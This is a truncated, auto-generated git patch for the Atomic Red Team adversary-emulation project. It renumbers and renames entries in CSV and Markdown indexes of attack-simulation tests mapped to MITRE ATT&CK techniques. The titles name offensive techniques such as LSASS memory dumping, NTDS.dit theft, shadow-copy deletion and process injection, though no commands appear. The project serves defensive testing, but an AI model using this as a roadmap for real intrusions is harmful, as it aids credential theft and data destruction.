From 4e08c0c4975e196f6ce8eb4914a2fa0cbd780cd7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 3 Apr 2020 17:14:40 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 67 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 12 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 55 +- atomics/Indexes/Indexes-Markdown/index.md | 49 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 45 +- atomics/Indexes/index.yaml | 2760 +++++++++-------- 9 files changed, 1534 insertions(+), 1464 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 31911c65..f3df7f3f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -78,7 +78,7 @@ persistence,T1165,1,add file to Local Library StartupItems persistence,T1501,1,Create Systemd Service persistence,T1154,1,Trap persistence,T1100,1,Web Shell Written to Disk -persistence,T1084,1,Persistence +persistence,T1084,1,Persistence via WMI Event Subscription persistence,T1004,1,Winlogon Shell Key Persistence - PowerShell persistence,T1004,2,Winlogon Userinit Key Persistence - PowerShell persistence,T1004,3,Winlogon Notify Key Logon Persistence - PowerShell @@ -138,13 +138,9 @@ defense-evasion,T1107,4,Delete a single file - Windows cmd defense-evasion,T1107,5,Delete an entire folder - Windows cmd defense-evasion,T1107,6,Delete a single file - Windows PowerShell defense-evasion,T1107,7,Delete an entire folder - Windows PowerShell -defense-evasion,T1107,8,Delete VSS - vssadmin -defense-evasion,T1107,9,Delete VSS - wmic -defense-evasion,T1107,10,bcdedit -defense-evasion,T1107,11,wbadmin -defense-evasion,T1107,12,Delete Filesystem - Linux -defense-evasion,T1107,13,Delete-PrefetchFile -defense-evasion,T1107,14,Delete TeamViewer Log Files +defense-evasion,T1107,8,Delete Filesystem - Linux +defense-evasion,T1107,9,Delete-PrefetchFile +defense-evasion,T1107,10,Delete TeamViewer Log Files defense-evasion,T1222,1,Take ownership using takeown utility defense-evasion,T1222,2,Take ownership recursively using takeown utility defense-evasion,T1222,3,cacls - Grant permission to specified user or group @@ -206,11 +202,9 @@ defense-evasion,T1036,7,Masquerading - windows exe running as different windows defense-evasion,T1036,8,Malicious process Masquerading as LSM.exe defense-evasion,T1112,1,Modify Registry of Current User Profile - cmd defense-evasion,T1112,2,Modify Registry of Local Machine - cmd -defense-evasion,T1112,3,Modify Registry of Another User Profile -defense-evasion,T1112,4,Modify registry to store logon credentials -defense-evasion,T1112,5,Modify registry to store PowerShell code -defense-evasion,T1112,6,Add domain to Trusted sites Zone -defense-evasion,T1112,7,Javascript in registry +defense-evasion,T1112,3,Modify registry to store logon credentials +defense-evasion,T1112,4,Add domain to Trusted sites Zone +defense-evasion,T1112,5,Javascript in registry defense-evasion,T1170,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject defense-evasion,T1170,2,Mshta calls a local VBScript file to launch notepad.exe defense-evasion,T1170,3,Mshta executes VBScript to execute malicious command @@ -227,11 +221,10 @@ defense-evasion,T1502,1,Parent PID Spoofing using PowerShell defense-evasion,T1150,1,Plist Modification defense-evasion,T1093,1,Process Hollowing using PowerShell defense-evasion,T1055,1,Process Injection via mavinject.exe -defense-evasion,T1055,2,Process Injection via PowerSploit -defense-evasion,T1055,3,Shared Library Injection via /etc/ld.so.preload -defense-evasion,T1055,4,Shared Library Injection via LD_PRELOAD -defense-evasion,T1055,5,Process Injection via C# -defense-evasion,T1055,6,svchost writing a file to a UNC path +defense-evasion,T1055,2,Shared Library Injection via /etc/ld.so.preload +defense-evasion,T1055,3,Shared Library Injection via LD_PRELOAD +defense-evasion,T1055,4,Process Injection via C# +defense-evasion,T1055,5,svchost writing a file to a UNC path defense-evasion,T1121,1,Regasm Uninstall Method Call Test defense-evasion,T1121,2,Regsvs Uninstall Method Call Test defense-evasion,T1117,1,Regsvr32 local COM scriptlet execution @@ -298,11 +291,10 @@ privilege-escalation,T1502,1,Parent PID Spoofing using PowerShell privilege-escalation,T1150,1,Plist Modification privilege-escalation,T1504,1,Append malicious start-process cmdlet privilege-escalation,T1055,1,Process Injection via mavinject.exe -privilege-escalation,T1055,2,Process Injection via PowerSploit -privilege-escalation,T1055,3,Shared Library Injection via /etc/ld.so.preload -privilege-escalation,T1055,4,Shared Library Injection via LD_PRELOAD -privilege-escalation,T1055,5,Process Injection via C# -privilege-escalation,T1055,6,svchost writing a file to a UNC path +privilege-escalation,T1055,2,Shared Library Injection via /etc/ld.so.preload +privilege-escalation,T1055,3,Shared Library Injection via LD_PRELOAD +privilege-escalation,T1055,4,Process Injection via C# +privilege-escalation,T1055,5,svchost writing a file to a UNC path privilege-escalation,T1053,1,At.exe Scheduled task privilege-escalation,T1053,2,Scheduled task Local privilege-escalation,T1053,3,Scheduled task Remote @@ -318,17 +310,14 @@ privilege-escalation,T1206,2,Disable tty_tickets for sudo caching privilege-escalation,T1100,1,Web Shell Written to Disk impact,T1531,1,Change User Password - Windows impact,T1531,2,Delete User - Windows -impact,T1485,1,Windows - Delete Volume Shadow Copies -impact,T1485,2,Windows - Delete Windows Backup Catalog -impact,T1485,3,Windows - Disable Windows Recovery Console Repair -impact,T1485,4,Windows - Overwrite file with Sysinternals SDelete -impact,T1485,5,macOS/Linux - Overwrite file with DD -impact,T1485,6,Windows - Delete Backup Files +impact,T1485,1,Windows - Overwrite file with Sysinternals SDelete +impact,T1485,2,macOS/Linux - Overwrite file with DD impact,T1490,1,Windows - Delete Volume Shadow Copies impact,T1490,2,Windows - Delete Volume Shadow Copies via WMI impact,T1490,3,Windows - Delete Windows Backup Catalog impact,T1490,4,Windows - Disable Windows Recovery Console Repair impact,T1490,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell +impact,T1490,6,Windows - Delete Backup Files impact,T1496,1,macOS/Linux - Simulate CPU Load with Yes impact,T1489,1,Windows - Stop service using Service Controller impact,T1489,2,Windows - Stop service using net.exe @@ -435,15 +424,17 @@ credential-access,T1003,2,Gsecdump credential-access,T1003,3,Windows Credential Editor credential-access,T1003,4,"Registry dump of SAM, creds, and secrets" credential-access,T1003,5,Dump LSASS.exe Memory using ProcDump -credential-access,T1003,6,Dump LSASS.exe Memory using Windows Task Manager -credential-access,T1003,7,Offline Credential Theft With Mimikatz -credential-access,T1003,8,Dump Active Directory Database with NTDSUtil -credential-access,T1003,9,Create Volume Shadow Copy with NTDS.dit -credential-access,T1003,10,Copy NTDS.dit from Volume Shadow Copy -credential-access,T1003,11,GPP Passwords (findstr) -credential-access,T1003,12,GPP Passwords (Get-GPPPassword) -credential-access,T1003,13,LSASS read with pypykatz -credential-access,T1003,14,Registry parse with pypykatz +credential-access,T1003,6,Dump LSASS.exe Memory using comsvcs.dll +credential-access,T1003,7,Dump LSASS.exe Memory using direct system calls and API unhooking +credential-access,T1003,8,Dump LSASS.exe Memory using Windows Task Manager +credential-access,T1003,9,Offline Credential Theft With Mimikatz +credential-access,T1003,10,Dump Active Directory Database with NTDSUtil +credential-access,T1003,11,Create Volume Shadow Copy with NTDS.dit +credential-access,T1003,12,Copy NTDS.dit from Volume Shadow Copy +credential-access,T1003,13,GPP Passwords (findstr) +credential-access,T1003,14,GPP Passwords (Get-GPPPassword) +credential-access,T1003,15,LSASS read with pypykatz +credential-access,T1003,16,Registry parse with pypykatz credential-access,T1081,1,Extract Browser and System credentials with LaZagne credential-access,T1081,2,Extract passwords with grep credential-access,T1081,3,Extracting passwords with findstr diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 414f8a31..1ceea876 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -16,7 +16,7 @@ persistence,T1166,2,Set a SetUID flag on file persistence,T1166,3,Set a SetGID flag on file persistence,T1501,1,Create Systemd Service persistence,T1154,1,Trap -impact,T1485,5,macOS/Linux - Overwrite file with DD +impact,T1485,2,macOS/Linux - Overwrite file with DD impact,T1496,1,macOS/Linux - Simulate CPU Load with Yes impact,T1529,3,Restart System via `shutdown` - macOS/Linux impact,T1529,4,Shutdown System via `shutdown` - macOS/Linux @@ -75,7 +75,7 @@ defense-evasion,T1089,4,Disable SELinux defense-evasion,T1107,1,Delete a single file - Linux/macOS defense-evasion,T1107,2,Delete an entire folder - Linux/macOS defense-evasion,T1107,3,Overwrite and delete a file with shred -defense-evasion,T1107,12,Delete Filesystem - Linux +defense-evasion,T1107,8,Delete Filesystem - Linux defense-evasion,T1222,8,chmod - Change file or folder mode (numeric mode) defense-evasion,T1222,9,chmod - Change file or folder mode (symbolic mode) defense-evasion,T1222,10,chmod - Change file or folder mode (numeric mode) recursively @@ -94,8 +94,8 @@ defense-evasion,T1070,5,Overwrite Linux Log defense-evasion,T1130,1,Install root CA on CentOS/RHEL defense-evasion,T1036,2,Masquerading as Linux crond process. defense-evasion,T1027,1,Decode base64 Data into Script -defense-evasion,T1055,3,Shared Library Injection via /etc/ld.so.preload -defense-evasion,T1055,4,Shared Library Injection via LD_PRELOAD +defense-evasion,T1055,2,Shared Library Injection via /etc/ld.so.preload +defense-evasion,T1055,3,Shared Library Injection via LD_PRELOAD defense-evasion,T1014,1,Loadable Kernel Module based Rootkit defense-evasion,T1014,2,Loadable Kernel Module based Rootkit defense-evasion,T1064,1,Create and Execute Bash Shell Script @@ -139,8 +139,8 @@ command-and-control,T1105,5,sftp remote file copy (push) command-and-control,T1105,6,sftp remote file copy (pull) command-and-control,T1071,3,Malicious User Agents - Nix command-and-control,T1065,2,Testing usage of uncommonly used port -privilege-escalation,T1055,3,Shared Library Injection via /etc/ld.so.preload -privilege-escalation,T1055,4,Shared Library Injection via LD_PRELOAD +privilege-escalation,T1055,2,Shared Library Injection via /etc/ld.so.preload +privilege-escalation,T1055,3,Shared Library Injection via LD_PRELOAD privilege-escalation,T1166,1,Make and modify binary from C source privilege-escalation,T1166,2,Set a SetUID flag on file privilege-escalation,T1166,3,Set a SetGID flag on file diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 4aa94f06..600f116a 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -27,7 +27,7 @@ persistence,T1166,2,Set a SetUID flag on file persistence,T1166,3,Set a SetGID flag on file persistence,T1165,1,add file to Local Library StartupItems persistence,T1154,1,Trap -impact,T1485,5,macOS/Linux - Overwrite file with DD +impact,T1485,2,macOS/Linux - Overwrite file with DD impact,T1496,1,macOS/Linux - Simulate CPU Load with Yes impact,T1529,3,Restart System via `shutdown` - macOS/Linux impact,T1529,4,Shutdown System via `shutdown` - macOS/Linux @@ -109,7 +109,6 @@ defense-evasion,T1089,6,Disable LittleSnitch defense-evasion,T1089,7,Disable OpenDNS Umbrella defense-evasion,T1107,1,Delete a single file - Linux/macOS defense-evasion,T1107,2,Delete an entire folder - Linux/macOS -defense-evasion,T1107,14,Delete TeamViewer Log Files defense-evasion,T1222,8,chmod - Change file or folder mode (numeric mode) defense-evasion,T1222,9,chmod - Change file or folder mode (symbolic mode) defense-evasion,T1222,10,chmod - Change file or folder mode (numeric mode) recursively diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 9ffb3634..992b8564 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -37,12 +37,8 @@ defense-evasion,T1107,4,Delete a single file - Windows cmd defense-evasion,T1107,5,Delete an entire folder - Windows cmd defense-evasion,T1107,6,Delete a single file - Windows PowerShell defense-evasion,T1107,7,Delete an entire folder - Windows PowerShell -defense-evasion,T1107,8,Delete VSS - vssadmin -defense-evasion,T1107,9,Delete VSS - wmic -defense-evasion,T1107,10,bcdedit -defense-evasion,T1107,11,wbadmin -defense-evasion,T1107,13,Delete-PrefetchFile -defense-evasion,T1107,14,Delete TeamViewer Log Files +defense-evasion,T1107,9,Delete-PrefetchFile +defense-evasion,T1107,10,Delete TeamViewer Log Files defense-evasion,T1222,1,Take ownership using takeown utility defense-evasion,T1222,2,Take ownership recursively using takeown utility defense-evasion,T1222,3,cacls - Grant permission to specified user or group @@ -80,11 +76,9 @@ defense-evasion,T1036,7,Masquerading - windows exe running as different windows defense-evasion,T1036,8,Malicious process Masquerading as LSM.exe defense-evasion,T1112,1,Modify Registry of Current User Profile - cmd defense-evasion,T1112,2,Modify Registry of Local Machine - cmd -defense-evasion,T1112,3,Modify Registry of Another User Profile -defense-evasion,T1112,4,Modify registry to store logon credentials -defense-evasion,T1112,5,Modify registry to store PowerShell code -defense-evasion,T1112,6,Add domain to Trusted sites Zone -defense-evasion,T1112,7,Javascript in registry +defense-evasion,T1112,3,Modify registry to store logon credentials +defense-evasion,T1112,4,Add domain to Trusted sites Zone +defense-evasion,T1112,5,Javascript in registry defense-evasion,T1170,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject defense-evasion,T1170,2,Mshta calls a local VBScript file to launch notepad.exe defense-evasion,T1170,3,Mshta executes VBScript to execute malicious command @@ -99,9 +93,8 @@ defense-evasion,T1027,3,Execute base64-encoded PowerShell from Windows Registry defense-evasion,T1502,1,Parent PID Spoofing using PowerShell defense-evasion,T1093,1,Process Hollowing using PowerShell defense-evasion,T1055,1,Process Injection via mavinject.exe -defense-evasion,T1055,2,Process Injection via PowerSploit -defense-evasion,T1055,5,Process Injection via C# -defense-evasion,T1055,6,svchost writing a file to a UNC path +defense-evasion,T1055,4,Process Injection via C# +defense-evasion,T1055,5,svchost writing a file to a UNC path defense-evasion,T1121,1,Regasm Uninstall Method Call Test defense-evasion,T1121,2,Regsvs Uninstall Method Call Test defense-evasion,T1117,1,Regsvr32 local COM scriptlet execution @@ -157,9 +150,8 @@ privilege-escalation,T1050,2,Service Installation PowerShell privilege-escalation,T1502,1,Parent PID Spoofing using PowerShell privilege-escalation,T1504,1,Append malicious start-process cmdlet privilege-escalation,T1055,1,Process Injection via mavinject.exe -privilege-escalation,T1055,2,Process Injection via PowerSploit -privilege-escalation,T1055,5,Process Injection via C# -privilege-escalation,T1055,6,svchost writing a file to a UNC path +privilege-escalation,T1055,4,Process Injection via C# +privilege-escalation,T1055,5,svchost writing a file to a UNC path privilege-escalation,T1053,1,At.exe Scheduled task privilege-escalation,T1053,2,Scheduled task Local privilege-escalation,T1053,3,Scheduled task Remote @@ -216,22 +208,19 @@ persistence,T1058,1,Service Registry Permissions Weakness persistence,T1023,1,Shortcut Modification persistence,T1023,2,Create shortcut to cmd in startup folders persistence,T1100,1,Web Shell Written to Disk -persistence,T1084,1,Persistence +persistence,T1084,1,Persistence via WMI Event Subscription persistence,T1004,1,Winlogon Shell Key Persistence - PowerShell persistence,T1004,2,Winlogon Userinit Key Persistence - PowerShell persistence,T1004,3,Winlogon Notify Key Logon Persistence - PowerShell impact,T1531,1,Change User Password - Windows impact,T1531,2,Delete User - Windows -impact,T1485,1,Windows - Delete Volume Shadow Copies -impact,T1485,2,Windows - Delete Windows Backup Catalog -impact,T1485,3,Windows - Disable Windows Recovery Console Repair -impact,T1485,4,Windows - Overwrite file with Sysinternals SDelete -impact,T1485,6,Windows - Delete Backup Files +impact,T1485,1,Windows - Overwrite file with Sysinternals SDelete impact,T1490,1,Windows - Delete Volume Shadow Copies impact,T1490,2,Windows - Delete Volume Shadow Copies via WMI impact,T1490,3,Windows - Delete Windows Backup Catalog impact,T1490,4,Windows - Disable Windows Recovery Console Repair impact,T1490,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell +impact,T1490,6,Windows - Delete Backup Files impact,T1489,1,Windows - Stop service using Service Controller impact,T1489,2,Windows - Stop service using net.exe impact,T1489,3,Windows - Stop service by killing process @@ -294,15 +283,17 @@ credential-access,T1003,2,Gsecdump credential-access,T1003,3,Windows Credential Editor credential-access,T1003,4,"Registry dump of SAM, creds, and secrets" credential-access,T1003,5,Dump LSASS.exe Memory using ProcDump -credential-access,T1003,6,Dump LSASS.exe Memory using Windows Task Manager -credential-access,T1003,7,Offline Credential Theft With Mimikatz -credential-access,T1003,8,Dump Active Directory Database with NTDSUtil -credential-access,T1003,9,Create Volume Shadow Copy with NTDS.dit -credential-access,T1003,10,Copy NTDS.dit from Volume Shadow Copy -credential-access,T1003,11,GPP Passwords (findstr) -credential-access,T1003,12,GPP Passwords (Get-GPPPassword) -credential-access,T1003,13,LSASS read with pypykatz -credential-access,T1003,14,Registry parse with pypykatz +credential-access,T1003,6,Dump LSASS.exe Memory using comsvcs.dll +credential-access,T1003,7,Dump LSASS.exe Memory using direct system calls and API unhooking +credential-access,T1003,8,Dump LSASS.exe Memory using Windows Task Manager +credential-access,T1003,9,Offline Credential Theft With Mimikatz +credential-access,T1003,10,Dump Active Directory Database with NTDSUtil +credential-access,T1003,11,Create Volume Shadow Copy with NTDS.dit +credential-access,T1003,12,Copy NTDS.dit from Volume Shadow Copy +credential-access,T1003,13,GPP Passwords (findstr) +credential-access,T1003,14,GPP Passwords (Get-GPPPassword) +credential-access,T1003,15,LSASS read with pypykatz +credential-access,T1003,16,Registry parse with pypykatz credential-access,T1081,3,Extracting passwords with findstr credential-access,T1081,4,Access unattend.xml credential-access,T1214,1,Enumeration for Credentials in Registry diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bc14e541..a2e4aab4 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -141,7 +141,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -227,13 +227,9 @@ - Atomic Test #5: Delete an entire folder - Windows cmd [windows] - Atomic Test #6: Delete a single file - Windows PowerShell [windows] - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows] - - Atomic Test #8: Delete VSS - vssadmin [windows] - - Atomic Test #9: Delete VSS - wmic [windows] - - Atomic Test #10: bcdedit [windows] - - Atomic Test #11: wbadmin [windows] - - Atomic Test #12: Delete Filesystem - Linux [linux] - - Atomic Test #13: Delete-PrefetchFile [windows] - - Atomic Test #14: Delete TeamViewer Log Files [windows, macos] + - Atomic Test #8: Delete Filesystem - Linux [linux] + - Atomic Test #9: Delete-PrefetchFile [windows] + - Atomic Test #10: Delete TeamViewer Log Files [windows] - T1006 File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1222 File and Directory Permissions Modification](./T1222/T1222.md) - Atomic Test #1: Take ownership using takeown utility [windows] @@ -314,11 +310,9 @@ - [T1112 Modify Registry](./T1112/T1112.md) - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows] - Atomic Test #2: Modify Registry of Local Machine - cmd [windows] - - Atomic Test #3: Modify Registry of Another User Profile [windows] - - Atomic Test #4: Modify registry to store logon credentials [windows] - - Atomic Test #5: Modify registry to store PowerShell code [windows] - - Atomic Test #6: Add domain to Trusted sites Zone [windows] - - Atomic Test #7: Javascript in registry [windows] + - Atomic Test #3: Modify registry to store logon credentials [windows] + - Atomic Test #4: Add domain to Trusted sites Zone [windows] + - Atomic Test #5: Javascript in registry [windows] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] @@ -493,12 +487,8 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -511,6 +501,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux] @@ -658,15 +649,17 @@ - Atomic Test #3: Windows Credential Editor [windows] - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows] - - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] - - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows] - - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - - Atomic Test #11: GPP Passwords (findstr) [windows] - - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows] - - Atomic Test #13: LSASS read with pypykatz [windows] - - Atomic Test #14: Registry parse with pypykatz [windows] + - Atomic Test #6: Dump LSASS.exe Memory using comsvcs.dll [windows] + - Atomic Test #7: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #9: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #10: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #11: Create Volume Shadow Copy with NTDS.dit [windows] + - Atomic Test #12: Copy NTDS.dit from Volume Shadow Copy [windows] + - Atomic Test #13: GPP Passwords (findstr) [windows] + - Atomic Test #14: GPP Passwords (Get-GPPPassword) [windows] + - Atomic Test #15: LSASS read with pypykatz [windows] + - Atomic Test #16: Registry parse with pypykatz [windows] - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index b698d0ab..d89e252b 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -39,7 +39,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -157,7 +157,7 @@ - Atomic Test #1: Delete a single file - Linux/macOS [linux, macos] - Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] - - Atomic Test #12: Delete Filesystem - Linux [linux] + - Atomic Test #8: Delete Filesystem - Linux [linux] - [T1222 File and Directory Permissions Modification](./T1222/T1222.md) - Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 4f6557a3..fabca98a 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -56,7 +56,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -248,7 +248,6 @@ - [T1107 File Deletion](./T1107/T1107.md) - Atomic Test #1: Delete a single file - Linux/macOS [linux, macos] - Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos] - - Atomic Test #14: Delete TeamViewer Log Files [windows, macos] - [T1222 File and Directory Permissions Modification](./T1222/T1222.md) - Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b31ad7c8..2c31411d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -59,12 +59,8 @@ - Atomic Test #5: Delete an entire folder - Windows cmd [windows] - Atomic Test #6: Delete a single file - Windows PowerShell [windows] - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows] - - Atomic Test #8: Delete VSS - vssadmin [windows] - - Atomic Test #9: Delete VSS - wmic [windows] - - Atomic Test #10: bcdedit [windows] - - Atomic Test #11: wbadmin [windows] - - Atomic Test #13: Delete-PrefetchFile [windows] - - Atomic Test #14: Delete TeamViewer Log Files [windows, macos] + - Atomic Test #9: Delete-PrefetchFile [windows] + - Atomic Test #10: Delete TeamViewer Log Files [windows] - T1006 File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1222 File and Directory Permissions Modification](./T1222/T1222.md) - Atomic Test #1: Take ownership using takeown utility [windows] @@ -116,11 +112,9 @@ - [T1112 Modify Registry](./T1112/T1112.md) - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows] - Atomic Test #2: Modify Registry of Local Machine - cmd [windows] - - Atomic Test #3: Modify Registry of Another User Profile [windows] - - Atomic Test #4: Modify registry to store logon credentials [windows] - - Atomic Test #5: Modify registry to store PowerShell code [windows] - - Atomic Test #6: Add domain to Trusted sites Zone [windows] - - Atomic Test #7: Javascript in registry [windows] + - Atomic Test #3: Modify registry to store logon credentials [windows] + - Atomic Test #4: Add domain to Trusted sites Zone [windows] + - Atomic Test #5: Javascript in registry [windows] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] @@ -345,7 +339,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -356,11 +350,7 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -373,6 +363,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -472,15 +463,17 @@ - Atomic Test #3: Windows Credential Editor [windows] - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #5: Dump 